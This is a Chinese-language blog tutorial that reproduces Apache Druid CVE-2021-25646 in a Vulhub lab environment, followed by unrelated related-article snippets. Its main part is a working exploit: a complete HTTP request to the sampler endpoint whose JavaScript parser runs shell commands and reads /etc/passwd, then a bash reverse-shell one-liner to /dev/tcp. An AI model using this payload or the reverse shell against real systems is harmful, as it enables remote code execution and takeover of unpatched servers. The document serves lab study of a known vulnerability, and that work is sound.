当前位置: 首页 > news >正文

Vulhub靶机 Apache Druid(CVE-2021-25646)(渗透测试详解)

news 2026/4/21 6:04:32

一、开启vulhub环境

docker-compose up -d  启动
docker ps 查看开放的端口

1、漏洞范围

在Druid0.20.0及更低版本中

二、访问靶机IP 8888端口

1、点击Load data进入新界面后,再点击local disk按钮。

 2、进入新界面后,在标红框的Base directory栏写上quickstart/tutorial/,File filter栏写上wikiticker-2015-09-12-sampled.json.gz,写好后点击Preview,再点击Next

3、一直点击Next按钮,直到按钮文字为Next:Filter停止

 4、点击Next:Filter按钮,利用Burpsuite抓取该数据包,数据包如下

4、修改数据包为以下数据包

POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 912{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"test","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}
}

可见命令执行成功

 三、反弹shell

1、修改数据包命令为以下

'/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/IP/端口 0>&1'

成功反弹成功

至此,命令执行完成。

下期再见,家人们。

 

相关文章:

Vulhub靶机 Apache Druid(CVE-2021-25646)(渗透测试详解)

一、开启vulhub环境 docker-compose up -d 启动 docker ps 查看开放的端口 1、漏洞范围 在Druid0.20.0及更低版本中 二、访问靶机IP 8888端口 1、点击Load data进入新界面后,再点击local disk按钮。 2、进入新界面后,在标红框的Base directory栏写上…...

编程日记 2025/2/24 15:00:59

VSCode配置自动生成头文件

一、配置步骤: 1.打开命令面板(CtrlShiftp): 2.输入snippets 选择配置代码片段 3. 选择新建全局代码片段 输入文件名,比如header_cpp(随便定义),然后点击键盘回车按钮,得到下面这个文件。 增加配置文…...

编程日记 2025/2/24 14:59:57

Xcode如何高效的一键重命名某个关键字

1.选中某个需要修改的关键字; 2.右击,选择Refactor->Rename… 然后就会出现如下界面: 此时就可以一键重命名了。 还可以设置快捷键。 1.打开Settings 2.找到Key Bindings 3.搜索rename 4.出现三个,点击一个地方设置后其…...

编程日记 2025/2/24 14:58:56

React 高阶组件的优缺点

React 高阶组件的优缺点 优点 1. 代码复用性高 公共逻辑封装:当多个组件需要实现相同的功能或逻辑时,高阶组件可以将这些逻辑封装起来,避免代码重复。例如,多个组件都需要在挂载时进行数据获取操作,就可以创建一个数…...

编程日记 2025/2/24 14:57:54

(五)趣学设计模式 之 建造者模式!

目录 一、 啥是建造者模式?二、 为什么要用建造者模式?三、 建造者模式怎么实现?四、 建造者模式的应用场景五、 建造者模式的优点和缺点六、 总结 🌟我的其他文章也讲解的比较有趣😁,如果喜欢博主的讲解方…...

编程日记 2025/2/24 14:54:48

香橙派/树莓派 利用Wiring库 使用GPIO模拟PWM

香橙派或者树莓派 等开发板,本身带有硬件PWM,比如香橙派3 lts版,但是这个引脚不符合我的项目需求,我需要外接一个电机,在检测到人脸的时候 转动,但是这个硬件引脚,只要上电就开始输出pwm 信号,导…...

编程日记 2025/2/24 14:53:47

全面收集中间件Exporter适配:从Redis到ActiveMQ,掌握监控数据采集的最佳实践

#作者:任少近 文章目录 说明:一 Redis的适配exporter版1.1 Redis的exporter源码版本1.2 Redis的exporter的releases版1.3 Redis_exporter版本选择理由1.4 Redis_exporter docer镜像 二 Zookeeper的适配exporter版2.1 Zookeeper的exporter源码版本2.2 Zo…...

编程日记 2025/2/24 14:52:46

机器学习数学通关指南——链式法则

前言 本文隶属于专栏《机器学习数学通关指南》,该专栏为笔者原创,引用请注明来源,不足和错误之处请在评论区帮忙指出,谢谢! 本专栏目录结构和参考文献请见《机器学习数学通关指南》 正文 一、定义与公式 链式法则&a…...

编程日记 2025/2/24 14:51:44

JavaScript函数-arguments的使用

在JavaScript编程语言中,函数是构建复杂逻辑和实现代码复用的关键组件。虽然现代JavaScript(尤其是ES6及之后版本)提供了更多灵活的方式来处理函数参数(如剩余参数、默认参数等),但arguments对象仍然是一个…...

编程日记 2025/2/24 14:50:43

千峰React:函数组件使用(2)

前面写了三千字没保存&#xff0c;恨&#xff01; 批量渲染 function App() {const list [{id:0,text:aaaa},{id:1,text:bbbb},{id:2,text:cccc}]// for (let i 0; i < list.length; i) {// list[i] <li>{list[i]}</li>// }return (<div><…...

编程日记 2025/2/24 14:49:41

DPVS-3: 双臂负载均衡测试

测试拓扑 双臂模式&#xff0c; 使用两个网卡&#xff0c;一个对外&#xff0c;一个对内。 Client host是物理机&#xff0c; RS host都是虚拟机。 LB host是物理机&#xff0c;两个CX5网卡分别在两个子网。 配置文件 用dpvs.conf.sample作为双臂配置文件&#xff0c;其中…...

编程日记 2025/2/24 14:44:33

2016年下半年试题二:论软件设计模式及其应用

论文库链接&#xff1a;系统架构设计师论文 论文题目 软件设计模式(Software DesignPatter)是一套被反复使用的、多数人知晓的、经过分类编目的代码设计经验的总结。使用设计模式是为了重用代码以提高编码效率增加代码的可理解性、保证代码的可靠性。软件设计模式是软件开发中的…...

编程日记 2025/2/24 14:43:32

深入理解 SQL 中的 DATEDIFF 函数

深入理解 SQL 中的 DATEDIFF 函数 DATEDIFF 函数在 SQL 中是一个用于计算两个日期之间差值的重要工具。不同数据库实现了不同版本的 DATEDIFF&#xff0c;它们在功能和语法上有所不同。本文将详细解析 DATEDIFF 的用法、数据库间差异、复杂场景中的应用&#xff0c;以及替代方…...

编程日记 2025/2/24 14:39:25

【第二节】C++设计模式(创建型模式)-抽象工厂模式

目录 引言 一、抽象工厂模式概述 二、抽象工厂模式的应用 三、抽象工厂模式的适用场景 四、抽象工厂模式的优缺点 五、总结 引言 抽象工厂设计模式是一种创建型设计模式&#xff0c;旨在解决一系列相互依赖对象的创建问题。它与工厂方法模式密切相关&#xff0c;但在应用…...

编程日记 2025/2/24 14:34:17

【学习资料】嵌入式人工智能Embedded AI

图片来源&#xff1a; Embedded Artificial Intelligence for Business Purposes | DAC.digital 随着AI在设备端的应用&#xff0c;我们看到越来越多的可穿戴设备出现以及自动驾驶汽车的发展&#xff0c;可以看到嵌入式人工智能是新的发展方向。我为大家介绍嵌入式人工智能的…...

编程日记 2025/2/24 14:32:14

【Python爬虫(60)】解锁社交媒体数据宝藏:Python爬虫实战攻略

【Python爬虫】专栏简介&#xff1a;本专栏是 Python 爬虫领域的集大成之作&#xff0c;共 100 章节。从 Python 基础语法、爬虫入门知识讲起&#xff0c;深入探讨反爬虫、多线程、分布式等进阶技术。以大量实例为支撑&#xff0c;覆盖网页、图片、音频等各类数据爬取&#xff…...

编程日记 2025/2/24 14:30:10

C++ 继承,多态

看前须知&#xff1a; 本篇博客是作者听课时的笔记&#xff0c;不喜勿喷&#xff0c;若有疑问可以评论区一起讨论。 继承 定义&#xff1a; 继承机制是⾯向对象程序设计使代码可以复⽤的最重要的⼿段&#xff0c;它允许我们在保持原有 类特性的基础上进⾏扩展&#xff0c;增…...

编程日记 2025/2/24 14:29:06

Java中的Stream API:从入门到实战

引言 在现代Java开发中&#xff0c;Stream API 是处理集合数据的强大工具。它不仅让代码更加简洁易读&#xff0c;还能通过并行处理提升性能。本文将带你从基础概念入手&#xff0c;逐步深入Stream API的使用&#xff0c;并通过实战案例展示其强大功能。 1. 什么是Stream API…...

编程日记 2025/2/24 14:22:55

QPainter绘制3D 饼状图

先展示图片 核心代码如下&#xff1a; pie.h #ifndef Q3DPIE_H #define Q3DPIE_H#include <QtGui/QPen> #include <QtGui/QBrush>class Pie { public:double value; QBrush brush; QString description; double percentValue;QString p…...

编程日记 2025/2/24 14:15:44

【FAQ】HarmonyOS SDK 闭源开放能力 —Live View Kit (1)

1.问题描述&#xff1a; 客户端创建实况窗后&#xff0c;通过Push kit更新实况窗内容&#xff0c;这个过程是自动更新的还是客户端解析push消息数据后填充数据更新&#xff1f;客户端除了接入Push kit和创建实况窗还需要做什么工作&#xff1f; 解决方案&#xff1a; 通过Pu…...

编程日记 2025/2/24 14:13:34

Unity LineRenderer材质Tiling偏移实战:手把手教你实现动态行军蚂蚁线(附完整C#脚本)

Unity动态行军蚂蚁线深度解析&#xff1a;从Shader原理到性能优化实战 在RTS游戏或塔防类项目中&#xff0c;动态路径指示效果直接影响玩家的操作体验。传统静态线段缺乏动态反馈&#xff0c;而行军蚂蚁线&#xff08;Marching Ants&#xff09;通过纹理动画生动呈现路径走向与…...

编程新知 2026/4/21 4:23:08

3分钟永久激活Windows和Office:KMS_VL_ALL_AIO智能脚本终极指南

3分钟永久激活Windows和Office&#xff1a;KMS_VL_ALL_AIO智能脚本终极指南 【免费下载链接】KMS_VL_ALL_AIO Smart Activation Script 项目地址: https://gitcode.com/gh_mirrors/km/KMS_VL_ALL_AIO 还在为Windows激活弹窗烦恼&#xff1f;Office突然变成只读模式让你束…...

编程新知 2026/4/21 3:08:11

jQuery 遍历 - 祖先

jQuery 遍历 - 祖先元素 (Ancestors) 在 jQuery 中&#xff0c;祖先遍历用于从当前选中的元素向上查找其父级、祖父级等所有祖先元素。这对于动态定位、样式修改或数据获取非常有用。 一、核心方法 1. parent() - 获取直接父元素 只返回一级父元素。 // 语法 $(selector).paren…...

编程新知 2026/4/21 3:08:11

死磕 CTF 必藏!20 个练习平台,让你从菜鸟一路冲到大神

这20个CTF练习平台让你从菜鸟变大神&#xff01;零基础入门到精通&#xff0c;看这篇就够了&#xff01; 在网络安全领域&#xff0c;CTF&#xff08;Capture The Flag&#xff09;和渗透测试是每个技术爱好者梦寐以求的技能。但很多人会问&#xff1a;“我该怎么入门&#xf…...

编程新知 2026/4/21 1:54:38

SCH16T-K20陀螺仪、加速度计、惯性测量单元IMU、组合惯导系统

SCH16T-K20专为机器人、无人机和摄像头系统领域的OEM厂商以及需要安全关键型IMU的。 | SCH16T-K20专为机器人、无人机和摄像头系统领域的OEM厂商以及需要安全关键型IMU的IMU模块制造商和系统集成商而设计&#xff0c;SCH16T-K20提供市场居先的精度、机械稳健性和稳定性。SCH16T…...

编程新知 2026/4/21 1:44:06

AI Agent 开发的工业化道路:Harness 架构深度解析

1. 引言&#xff1a;从提示词工程到系统工程的范式转移在 AI Agent 迈向生产环境的过程中&#xff0c;开发者往往会陷入“提示词迷思”&#xff0c;试图通过无限堆砌 Prompt 来覆盖业务边界。然而&#xff0c;由于大模型本质上的概率性&#xff0c;纯粹的提示词工程在面对长链条…...

编程新知 2026/4/21 1:25:27

Qwen2-VL-2B-Instruct应用场景:媒体库智能打标与跨模态内容归档系统

Qwen2-VL-2B-Instruct应用场景&#xff1a;媒体库智能打标与跨模态内容归档系统 1. 项目背景与价值 现代企业和个人创作者都面临着一个共同的难题&#xff1a;随着图片、视频、文档等多媒体内容的爆炸式增长&#xff0c;如何高效地管理和检索这些资源&#xff1f;传统的文件名…...

编程新知 2026/4/21 0:56:16

告别串口助手!用NXP FreeMaster 3.0实时调PID,图形化调试真香了

嵌入式PID调参革命&#xff1a;NXP FreeMaster 3.0图形化实时调试实战 记得去年调试伺服电机时&#xff0c;我曾在实验室连续熬了三个通宵——每修改一次PID参数就要重新编译下载&#xff0c;然后盯着串口终端密密麻麻的数据流&#xff0c;试图从字符海洋里捕捉波形规律。直到同…...

编程新知 2026/4/20 23:07:53

终极指南:如何用YaeAchievement在3分钟内完成原神成就数据导出

终极指南&#xff1a;如何用YaeAchievement在3分钟内完成原神成就数据导出 【免费下载链接】YaeAchievement 更快、更准的原神数据导出工具 项目地址: https://gitcode.com/gh_mirrors/ya/YaeAchievement 还在为整理《原神》数百项成就而手动记录吗&#xff1f;YaeAchie…...

编程新知 2026/4/20 22:53:39

省级面板数据避坑指南:统计局2500指标的真实使用场景解析

省级面板数据实战解析&#xff1a;能源财政指标的深度验证与陷阱规避 当面对涵盖2500指标的省级面板数据时&#xff0c;智库研究员和政策分析师常常陷入两难&#xff1a;一方面欣喜于数据的丰富性&#xff0c;另一方面又担忧数据质量对研究结论的影响。特别是在能源转型和财政政…...

编程新知 2026/4/20 19:54:53